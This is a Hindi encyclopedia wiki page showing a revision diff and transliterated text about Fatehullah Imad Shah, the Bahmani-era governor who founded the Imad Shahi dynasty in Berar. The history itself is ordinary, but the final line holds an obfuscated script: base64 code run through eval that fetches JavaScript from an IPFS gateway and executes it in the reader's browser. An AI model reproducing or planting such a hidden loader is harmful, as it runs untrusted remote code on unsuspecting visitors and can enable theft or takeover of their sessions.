Difference between revisions of "फ़तेहउल्ला इमादशाह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''फ़तेहउल्ला इमादशाह''' चौदहवें बहमनी सुल...' के साथ नया पन्ना बनाया)
 
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
'''फ़तेहउल्ला इमादशाह''' चौदहवें [[बहमनी वंश|बहमनी]] सुल्तान महमूद (1482-1518 ई.) के शासनकाल में [[बरार]] का सूबेदार था।
+
'''फ़तेहउल्ला इमादशाह''' चौदहवें [[बहमनी वंश|बहमनी]] सुल्तान [[महमूद शाह बहमनी|महमूदशाह]] (1482-1518 ई.) के शासनकाल में [[बरार]] का [[सूबेदार]] था। राज्य में जो अराजकता तथा विघटन की स्थिति व्याप्त थी, उसका लाभ उठाकर फ़तेहउल्ला स्वयं शासक बन बैठा और उसने बरार में [[इमादशाही वंश]] की स्थापना की।
  
*फ़तेहउल्ला इमादशाह की सूबेदारी के समय सुल्तान महमूद नाबालिग था।
+
*फ़तेहउल्ला इमादशाह की सूबेदारी के समय सुल्तान महमूदशाह नाबालिग था।
 
*राज्य में महमूद ख़ाँ की हत्या से अराजकता की स्थिति उत्पन्न हो गई थी।
 
*राज्य में महमूद ख़ाँ की हत्या से अराजकता की स्थिति उत्पन्न हो गई थी।
 
*अराजकता और विघटन की स्थिति का लाभ उठाकर फ़तेहउल्ला 1484 ई. में बरार का शासक बन बैठा।
 
*अराजकता और विघटन की स्थिति का लाभ उठाकर फ़तेहउल्ला 1484 ई. में बरार का शासक बन बैठा।
Line 10: Line 10:
 
   
 
   
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय इतिहास कोश |लेखक= सच्चिदानन्द भट्टाचार्य|अनुवादक= |आलोचक= |प्रकाशक=उत्तर प्रदेश हिन्दी संस्थान |संकलन= |संपादन= |पृष्ठ संख्या=252|url=}}
 
{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय इतिहास कोश |लेखक= सच्चिदानन्द भट्टाचार्य|अनुवादक= |आलोचक= |प्रकाशक=उत्तर प्रदेश हिन्दी संस्थान |संकलन= |संपादन= |पृष्ठ संख्या=252|url=}}

Latest revision as of 06:42, 2 December 2012

fatehulla imadashah chaudahavean bahamani sultan mahamoodashah (1482-1518 ee.) ke shasanakal mean barar ka soobedar tha. rajy mean jo arajakata tatha vighatan ki sthiti vyapt thi, usaka labh uthakar fatehulla svayan shasak ban baitha aur usane barar mean imadashahi vansh ki sthapana ki.

  • fatehulla imadashah ki soobedari ke samay sultan mahamoodashah nabalig tha.
  • rajy mean mahamood khaan ki hatya se arajakata ki sthiti utpann ho gee thi.
  • arajakata aur vighatan ki sthiti ka labh uthakar fatehulla 1484 ee. mean barar ka shasak ban baitha.
  • shasak banane ke bad usane 'imadulmulk' ki upadhi dharan ki.
  • is prakar barar mean imadashahi vansh ka sootrapat hua.
  • imadashahi vansh ne 1574 ee. tak barar mean shasan kiya.
  • isake bad barar ko ahamadanagar mean mila liya gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bharatiy itihas kosh |lekhak: sachchidanand bhattachary |prakashak: uttar pradesh hindi sansthan |prishth sankhya: 252 |


sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>